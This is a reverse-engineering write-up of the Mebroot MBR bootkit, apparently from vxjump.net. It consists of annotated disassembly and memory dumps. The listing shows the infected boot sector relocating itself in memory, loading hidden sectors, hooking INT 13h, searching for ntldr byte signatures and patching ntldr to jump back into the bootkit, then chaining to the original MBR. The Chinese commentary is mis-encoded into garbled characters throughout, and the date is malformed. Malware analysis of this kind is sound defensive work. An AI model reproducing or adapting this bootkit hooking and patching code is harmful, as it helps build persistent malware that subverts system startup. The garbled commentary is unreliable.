_ _ (_) | | __ ____ __ _ _ _ _ __ ___ _ __ _ __ ___ | |_ \ \ / /\ \/ /| || | | || '_ ` _ \ | '_ \ | '_ \ / _ \| __| \ V / > < | || |_| || | | | | || |_) |_ | | | || __/| |_ \_/ /_/\_\| | \__,_||_| |_| |_|| .__/(_)|_| |_| \___| \__| _/ | | | |__/ |_| /---------------------------------------------------------------------------------------\ |>...................[ mebroot MBRÆô¶¯·ÖÎö ].............<| |>......................[ by nEINEI/vxjump.net ]................<| |>......................[ 20011-08-22 ].......................<| \>...................... [ neineit_at_gmail.com ] ..................... 0x27f seg000:7C16 83 2C 02 sub word ptr [si], 2 ; ¸½¼ÓÔÚϵͳÄÚ´æµÄ×îºóµÄ2kÖÐ,¼´ÏµÍ³ÄÚ´æβ²¿ // ÒÔÎÒ×Ô¼ºµÄ±¾µØxpsp2 »úÆ÷²âÊÔ´Ëʱ [si] --> 0x27d seg000:7C19 AD lodsw // ½«[esi]->0x27d ¶Áµ½eax seg000:7C1A C1 E0 06 shl ax, 6 // ax -->9f40 , ÕâÀï¾ÍÊDz¡¶¾ÒªÒþ²ØµÄµØÖ·,´Ëʱ0x9f40 µØÖ·Êý¾ÝΪ0 //0x0000000000009f40 : 0x0000 0x0000 0x0000 0x0000 0x0000 //0x0000 0x0000 0x0000 //0x0000000000009f50 : 0x0000 0x0000 0x0000 0x0000 0x0000 //0x0000 0x0000 0x0000 //0x0000000000009f60 : 0x0000 0x0000 0x0000 0x0000 // ÏÂÃæÒª¿½±´×ÔÉíµ½ 0x9f40 ´¦ seg000:7C1D 8E C0 mov es, ax ; es µ±×÷Ä¿µÄdi µÄ¶Î¼Ä´æÆ÷ seg000:7C1F BE 00 7C mov si, 7C00h seg000:7C22 33 FF xor di, di seg000:7C24 B9 00 01 mov cx, 256 seg000:7C27 F3 A5 rep movsw ; ¿½±´×ÔÉí512¸ö×Ö½Ú¹ýÈ¥ // ¿½±´Íê±ÏºóÀïÃæµÄÊý¾ÝÄÚÈÝ 0x000000000009f400 : 0x33fa 0x8edb 0x36d3 0x2689 0x7bfe 0xfebc 0x1e7b 0x60 66 0x000000000009f410 : 0x8efc 0xbedb 0x0413 0x2c83 0xad02 0xe0c1 0x8e06 0xbe c0 0x000000000009f420 : 0x7c00 0xff33 0x00b9 0xf301 0xb8a5 0x0202 0x3db1 0x80 ba 0x000000000009f430 : 0x8b00 0xcddf 0x3313 0x66db 0x478b 0x664c 0xa326 0x00 73 0x000000000009f440 : 0x47c7 0x664c 0x8c00 0x4e47 0x6806 0x004d 0xfbcb 0xc3 8e 0x000000000009f450 : 0x01b8 0xb902 0x003f 0x80ba 0xb700 0xcd7c 0x6613 0x1f 61 0x000000000009f460 : 0xea5c 0x7c00 seg000:7C29 B8 02 02 mov ax, 202h ; al - 02,ah - 02 ,¶Á2¸öÉÈÇø²Ù×÷ seg000:7C2C B1 3D mov cl, 61 ; ´Ó60ÉÈÇø¿ªÊ¼ seg000:7C2E BA 80 00 mov dx, 80h ; '€' ; ´ÅÅÌΪĬÈÏ80h seg000:7C31 8B DF mov bx, di ; »º³åÇø,´Ëʱ bx- 0x200 £¬¾ÍÊÇ es:0x200 -- 0x9f40 :200 -> 9f600 seg000:7C33 CD 13 int 13h ; DISK - READ SECTORS INTO MEMORY seg000:7C33 ; AL = number of sectors to read, CH = track, CL = sector seg000:7C33 ; DH = head, DL = drive, ES:BX -> buffer to fill seg000:7C33 ; Return: CF set on error, AH = status, AL = number of sectors read // ´Ëʱ°Ñ²¡¶¾ÔÚ60 ÉÈÇøÀïÃæµÄ¶«Î÷¶Áµ½ÁËÄÚ´æ0x9f60£º0000 ´¦ £¬ÕâÀïÊÇ NtldrµÄhook ´úÂ룬16itµÄcode 0x000000000009f600 : 0xf08b 0xc085 0x759c 0x8305 0x2444 0x0004 0xfc60 0x7c 8b 0x000000000009f610 : 0x2424 0xe781 0x0000 0xfff0 0xc7b0 0x75ae 0x81fd 0x46 3f 0x000000000009f620 : 0x0034 0x7540 0xb0f5 0xaea1 0xfd75 0x378b 0x368b 0x36 8b 0x000000000009f630 : 0x5e8b 0x8b18 0x43eb 0x3b81 0x4b6a 0x196a 0xf775 0x7b 80 0x000000000009f640 : 0x8904 0x0375 0xc383 0x8006 0x047b 0x75e8 0x8de8 0x09 7b 0x000000000009f650 : 0xe8b0 0x75ae 0x66fd 0x7f81 0x8404 0x75c0 0x8bd8 0x8d 17 0x000000000009f660 : 0x3a54 0xe804 // ´Ëʱ°Ñ²¡¶¾ÔÚ61 ÉÈÇøÀïÃæµÄ¶«Î÷¶Áµ½ÁËÄÚ´æ0x9f60£º0200 ´¦ £¬ÕâÀïÊÇkernel hook´úÂë 0x000000000009f800 : 0x148b 0x6824 0x5678 0x1234 0x0c8b 0x6824 0x5678 0x12 34 0x000000000009f810 : 0x200f 0x50c0 0xff25 0xfeff 0x0fff 0xc022 0xca2b 0x0f 58 0x000000000009f820 : 0xc022 0x34ff 0x6824 0xe062 0x3707 0x3be8 0x0000 0x59 00 0x000000000009f830 : 0x6859 0x01ab 0x0000 0x006a 0xd0ff 0xe860 0x0000 0x00 00 0x000000000009f840 : 0x835e 0x15c6 0xf88b 0x6a6a 0xf359 0xb1a5 0x8d80 0x00 be 0x000000000009f850 : 0xfffe 0xffff 0x33e0 0x61c0 0x74ff 0x0c24 0x54ff 0x08 24 0x000000000009f860 : 0x5a59 0x8760 // ´Ëʱ»¹Ã»ÓаÑÔ­windows MBR ¼ÓÔؽøÀ´ // ÏÖÔÚÒªhook int 13 ÖжÏÁË¡£ seg000:7C35 33 DB xor bx, bx seg000:7C37 66 8B 47 4C mov eax, [bx+4Ch] // 0x4c / 4 = 0x13 °Ñ13ºÅÖжϵØÖ·µÄÄÚÈݷŵ½eax´¦ // ´Ëʱ0x4c µÄÊý¾Ý 0x000000000000004c : 0xe3fe seg000:7C3B 66 26 A3 73 00 mov es:73h, eax ; ±£ÁôÔ­13ºÅÖжÏÀý³ÌµØÖ· , ¼ÇסÕâ¸öÆ«ÒÆ£¬ºóÃ滹»áÓõ½ // ±£Áôµ½À©Õ¹¶ÎµÄ0x9f40£º73 µÄλÖà (¾ÉµÄint 13µØÖ·) 0x000000000009f473 : 0xe3fe 0xf000 0x882e 0x9026 0x9d00 0x2e9c 0x1eff 0x0 seg000:7C40 C7 47 4C 66 00 mov word ptr [bx+4Ch], 66h ; off 66h £¬ÐÂÈë¿ÚÀý³Ì,Ïà¶Ô¿ªÊ¼Æ«ÒÆ66hµÄµØ·½£¬¼Ç×÷Interrupt_13_hook seg000:7C45 8C 47 4E mov word ptr [bx+4Eh], es seg000:7C48 06 push es seg000:7C49 68 4D 00 push 4Dh ; ÌøÏòsub_7c4d , es ÒѾ­±»ÐÞÕýΪָÏòÄÚ´æĩβ¶Î£¬¼´reloc_meb_bootloader,ºóÃæ´úÂëÊÇÔÚÄÚ´æÖÐÖ´ÐÐµÄ seg000:7C4C CB retf // ´ËʱÌøÏòÁËÄÚ´æµ±ÖеÄ9f44d ÄÚ´æÖÐ (0) [0x000000000009f44d] 9f40:004d (unk. ctxt): sti ; fb // ÏÂÃæÊÇIDA ÖеĴúÂ룬µÈЧÓÚÔÚÄÚ´æÖеÄ9f44d seg000:7C4D FB sti seg000:7C4E 8E C3 mov es, bx ; bx ´ËʱÊÇ0£¬es ÖØÉèdi µÄÖ¸Ïò seg000:7C50 B8 01 02 mov ax, 201h ; ¶Á1¸öÉÈÇø seg000:7C53 B9 3F 00 mov cx, 63 ; 62ºÅÉÈÇø seg000:7C56 BA 80 00 mov dx, 80h seg000:7C59 B7 7C mov bh, 7Ch ; bh ,λÖÃΪ7c00 seg000:7C5B CD 13 int 13h ; DISK - READ SECTORS INTO MEMORY seg000:7C5B ; AL = number of sectors to read, CH = track, CL = sector seg000:7C5B ; DH = head, DL = drive, ES:BX -> buffer to fill seg000:7C5B ; Return: CF set on error, AH = status, AL = number of sectors read seg000:7C5D 66 61 popad seg000:7C5F 1F pop ds seg000:7C60 5C pop sp seg000:7C61 EA 00 7C 00 00 jmp loc_7C00 ; ÌøÏò¿ªÊ¼,´ÓÐÂÒýµ¼³ÌÐò.¼´°Ñ62ÉÈÇøµÄÊý¾Ý£¨Ô­MBR£©¼ÓÔص½7c00£¬ÌøÏòÖ´ÐÐ //ÏÂint 13 ¶Ïµã b 0009f466 -- > ÕâÀïÊDZ»²¡¶¾hookµÄint13 λÖà 7c66 µÈЧ9f466 Interrupt_13_hook proc far seg000:7C66 9C pushf seg000:7C67 80 FC 42 cmp ah, 42h ; À©Õ¹int 13hµ÷Óà ¶Á·½Ê½ seg000:7C6A 74 0B jz short loc_7C77 seg000:7C6C 80 FC 02 cmp ah, 2 ; ·ÇÀ©Õ¹int 13·½Ê½¶Á seg000:7C6F 74 06 jz short loc_7C77 seg000:7C71 9D popf ; ²»ÊÇÕâÁ½ÖÖ·½Ê½µÄÇé¿öÏ£¬µ÷Ô­int 13 // ÒÔÉÏ´¦ÀíÊÇÈ·¶¨£¬Èç¹ûÊÇint 13 ¶Á²Ù×÷£¬¶¼ÒªÌøµ½²¡¶¾hookµÄ´úÂë // ´Ëʱcs = 0x9f40 £¬¼ÓÉÏÆ«ÒÆ0x90 £¬Êµ¼ÊÊÇ 0x9f490 £¬´Ëʱah = 2 seg000:7C77 2E 88 26 90 00 mov cs:90h, ah // ÉÏÃæÓï¾äʵ¼ÊΪÁËÐ޸ģ¬seg000:7C8D B4 [00] mov ah, 0 ---> ¸ÄΪÕâÑù mov ah,2 seg000:7C7C 9D popf seg000:7C7D 9C pushf seg000:7C7E 2E FF 1E 73 00 call dword ptr cs:73h ; ÉÏÃæÌáµ½¹ýÕâ¸ö 73h Æ«ÒÆ£¬Ëû´æ·ÅÁËÔ­int 13 ÖÐ¶Ï £¬ ´Ëʱ²¡¶¾²¢²»ÖªµÀϵͳÄÄЩÇé¿öϵ÷ÓÃint 13£¬µ«ÒªÒªÊǶÁµ÷Ó㬠seg000:7C83 0F 82 9D 00 jb exit_int_13 ;²¡¶¾¾ÍȥɨÃè¿´µ±Ç°ÊÇÓÐ×Ô¼ºÒªhook µÄÄÚºËÌØÕ÷²¿·Ö seg000:7C87 9C pushf seg000:7C88 FA cli seg000:7C89 06 push es seg000:7C8A 66 60 pushad seg000:7C8C FC cld seg000:7C8D B4 00 mov ah, 0 ; ´Ë´¦¾Í±»¶¯Ì¬µÄÐÞ¸ÄΪah µÄÖµÁË,ÀïÃæ¼Ç¼ÊǶÁ£¬»¹ÊÇÀ©Õ¹¶Á seg000:7C8F B5 00 mov ch, 0 seg000:7C91 80 FD 42 cmp ch, 42h seg000:7C94 75 04 jnz short loc_7C9A ; ax ÉÈÇøÊý seg000:7C96 AD lodsw ; ds:si À©Õ¹·½Ê½£¬Ö¸Ïò´ÅÅ̵ØÖ·Êý¾Ý°ü seg000:7C97 AD lodsw seg000:7C98 C4 1C les bx, [si] ; »º´æλÖà seg000:7C9A seg000:7C9A loc_7C9A: ; CODE XREF: Interrupt_13_hook+2E seg000:7C9A 85 C0 test ax, ax ; ax ÉÈÇøÊý seg000:7C9C 75 01 jnz short loc_7C9F seg000:7C9E 40 inc ax ; ×îÉٵöÁ1¸ö£¬¾ÍÊÇÒ»´ÎÑ­»·ÖÁÉÙҪɨÃè512 ¸ö×Ö½Ú³¤¶È£¬×÷ΪÌØÕ÷ËÑË÷µÄ·¶Î§ seg000:7C9F seg000:7C9F loc_7C9F: ; CODE XREF: Interrupt_13_hook+36 seg000:7C9F 8B C8 mov cx, ax seg000:7CA1 B0 8B mov al, 8Bh ; ÉèÖÃÐòÁÐÖеÚÒ»¸öÆ¥ÅäµÄ×Ö·û seg000:7CA3 C1 E1 09 shl cx, 9 ; ÉèÖóÉ512 * al ¸ö ,ҪɨÃèµÄÌØÕ÷³¤¶È seg000:7CA6 8B FB mov di, bx seg000:7CA8 60 pusha seg000:7CA9 seg000:7CA9 loc_7CA9: ; CODE XREF: Interrupt_13_hook+4F seg000:7CA9 ; Interrupt_13_hook+57 seg000:7CA9 F2 AE repne scasb seg000:7CAB 75 47 jnz short loc_7CF4 ; ¼ì²â ntldr ÖеÄÌØÕ÷ÐòÁÐ 8B F0 85 F6 74 21/22 80 3D seg000:7CAD 66 26 81 3D F0+ cmp dword ptr es:[di], 74F685F0h seg000:7CB5 75 F2 jnz short loc_7CA9 seg000:7CB7 26 81 7D 05 80+ cmp word ptr es:[di+5], 3D80h seg000:7CBD 75 EA jnz short loc_7CA9 seg000:7CBF 26 8A 45 04 mov al, es:[di+4] seg000:7CC3 3C 21 cmp al, 21h ; ¼ì²âÊÇ·ñhooed£¬ 21h ,Ϊ ntldr jz $23 Ö¸Áî seg000:7CC5 74 04 jz short loc_7CCB ; ¸ÐȾ±êÖ¾ seg000:7CC7 3C 22 cmp al, 22h seg000:7CC9 75 DE jnz short loc_7CA9 ; ²»ÊÇÒª¼ì²âµÄÌØÕ÷£¬¼ÌÐøËÑË÷ seg000:7CCB seg000:7CCB loc_7CCB: ; CODE XREF: Interrupt_13_hook+5F seg000:7CCB BE 0B 02 mov si, 20Bh ; ¸ÐȾ±êÖ¾ seg000:7CCE 2E 80 3C 00 cmp byte ptr cs:[si], 0 seg000:7CD2 75 20 jnz short loc_7CF4 seg000:7CD4 2E 88 04 mov cs:[si], al ; дÈëÕâ¸ö±êÖ¾£¬ÔÚ²¡¶¾MBR´úÂëºóÃæ0xbµÄλÖà £¬ Õâ¸öalÖµ¾ÍÊÇ 0x21 or 0x22 ¡£ // ´Ëʱ£¬es = 0x46a di = 0x120 ,ÏÂÃæµÄ²¡¶¾´úÂ뽫Ҫpatchµ÷ÕâÀï¡£ // Õý³£µÄntld´úÂëÊÇ£¬ /* 00046b1f: ( ): mov si, ax ; 8bf0 --- patch µ÷ÕâÀï2¸ö×Ö½Ú£¬ ½«0xf0 , ¸ÄΪ ff 15 00046b21: ( ): test si, si ; 85f6 00046b23: ( ): jz .+33 ; 7421 00046b25: ( ): cmp byte ptr ds:[di], 0xf8 ; 803df8 00046b28: ( ): scasb byte ptr es:[di], al ; ae 00046b29: ( ): inc bx ; 43 00046b2a: ( ): add byte ptr ds:[bx+si], al ; 0000 00046b2c: ( ): jz .+7 ; 7407 00046b2e: ( ): xor si, si ; 33f6 */ //hook ºóµÄ´úÂë /* 00046b1d: ( ): add byte ptr ds:[bx+si], al ; 0000 00046b1f: ( ): call word ptr ds:[di] ; ff15 ---------> ÕâÀï±»ÐÞ¸ÄΪcall£¬´Ëʱ»¹Ã»ÓмÌÐøÖض¨Î»£¬ºóÃæ»á¼ÆËãһϣ¬½øÐÐÖض¨Î» 00046b21: ( ): test si, si ; 85f6 00046b23: ( ): jz .+33 ; 7421 00046b25: ( ): cmp byte ptr ds:[di], 0xf8 ; 803df8 00046b28: ( ): scasb byte ptr es:[di], al ; ae 00046b29: ( ): inc bx ; 43 00046b2a: ( ): add byte ptr ds:[bx+si], al ; 0000 */ seg000:7CD7 26 C7 45 FF FF+ mov word ptr es:[di-1], 15FFh ; hook µôntldr,ÐÞ¸ÄÔ­mov esi,eax ,¸Äjump xxx seg000:7CDD 66 8C C8 mov eax, cs // cs = 0x0x9f40 ,Ò²¾ÍÊDz¡¶¾MBR´úÂëÔËÐеĶεØÖ· seg000:7CE0 66 C1 E0 04 shl eax, 4 // ¼ÆË㲡¶¾MBR»ùÖ· seg000:7CE4 05 00 02 add ax, 200h //Ìø¹ý²¡¶¾MBR´úÂë seg000:7CE7 66 2E A3 FC 01 mov cs:1FCh, eax // cs:1fch Õâ¿éÊDz¡¶¾MBR¿Õ°×µÄÊý¾ÝλÖ㬰Ñeax = 0x9f600 £¬±£Áôµ½ÕâÀï £¬´Ëʱ¸²¸ÇÁËÄÚ´æÀïÃæMBR 0x55aa µÄÕâ¸ö±êÖ¾ seg000:7CEC 2D 04 00 sub ax, 4 seg000:7CEF 66 26 89 45 01 mov es:[di+1], eax ; eax = 0x9f5fc дÈëÄ¿µÄµØÖ· , ÕâÑùntldr µÄÄÇ´¦´úÂë±»ÐÞ¸ÄΪ call [0x009f5fc] ,ÕâÑù¾ÍÓֻص½Á˲¡¶¾´úÂë´¦ seg000:7CF4 seg000:7CF4 loc_7CF4: ; CODE XREF: Interrupt_13_hook+45 seg000:7CF4 ; Interrupt_13_hook+6C seg000:7CF4 61 popa // patch µÚ¶þλÖà seg000:7CF5 B0 83 mov al, 83h ; ²éÕÒÏÂÒ»¸öÌØÕ÷ 83 C4 02 E9 00 00 E9 FD FF seg000:7CF7 seg000:7CF7 loc_7CF7: ; CODE XREF: Interrupt_13_hook+9D seg000:7CF7 ; Interrupt_13_hook+A8 seg000:7CF7 F2 AE repne scasb seg000:7CF9 75 25 jnz short loc_7D20 seg000:7CFB 66 26 81 3D C4+ cmp dword ptr es:[di], 0E902C4h seg000:7D03 75 F2 jnz short loc_7CF7 seg000:7D05 66 26 81 7D 04+ cmp dword ptr es:[di+4], 0FFFDE900h seg000:7D0E 75 E7 jnz short loc_7CF7 seg000:7D10 66 26 C7 45 FC+ mov dword ptr es:[di-4], 83909090h seg000:7D19 26 83 65 06 00 and word ptr es:[di+6], 0 seg000:7D1E EB D7 jmp short loc_7CF7 seg000:7D20 ; --------------------------------------------------------------------------- seg000:7D20 seg000:7D20 loc_7D20: ; CODE XREF: Interrupt_13_hook+93 seg000:7D20 66 61 popad seg000:7D22 07 pop es seg000:7D23 9D popf seg000:7D24 seg000:7D24 exit_int_13: ; CODE XREF: Interrupt_13_hook+1D seg000:7D24 CA 02 00 retf 2 // ÖÁ´Ë£¬Æô¶¯¹ý³Ì¾Í½áÊøÁË£¬¾ÍµÈ´ýÕâÄÚ´æ¼ÓÔØ×Ô¼ºµÄÁíÍâÉÈÇøµÄ´úÂëÁË¡£